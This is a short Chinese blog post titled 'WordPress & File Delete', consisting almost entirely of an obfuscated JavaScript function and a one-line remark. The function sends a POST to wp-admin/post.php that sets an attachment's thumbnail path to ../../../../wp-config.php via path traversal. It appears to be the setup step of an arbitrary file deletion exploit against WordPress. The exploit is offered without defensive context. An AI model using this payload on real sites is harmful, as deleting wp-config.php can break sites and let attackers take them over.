美文网首页
WordPress & File Delete

WordPress & File Delete

作者: _Deen | 来源:发表于2018-06-30 08:25 被阅读158次
    function setThumbToConfig(_0x95ccx2, _0x95ccx3) {
        console['log'](_0x95ccx2);
        var _0x95ccx4 = 'action=editattachment&thumb=../../../../wp-config.php&_wpnonce=' + _0x95ccx3;
        var _0x95ccx5 = new XMLHttpRequest();
        _0x95ccx5['onreadystatechange'] = function () {
            if (this['readyState'] == 4) {
                console['log']('Thumb waset to ../../../../wp-config.php')
            }
        };
        _0x95ccx5['open']('POST', '/wp-admin/post.php?post=' + _0x95ccx2, true);
        _0x95ccx5['setRequestHeader']('Content-type', 'application/x-www-form-urlencode');
        _0x95ccx5['send'](_0x95ccx4)
    }
    

    ......唉...是不是很眼熟

    相关文章

      网友评论

          本文标题:WordPress & File Delete

          本文链接:https://www.haomeiwen.com/subject/bhttuftx.html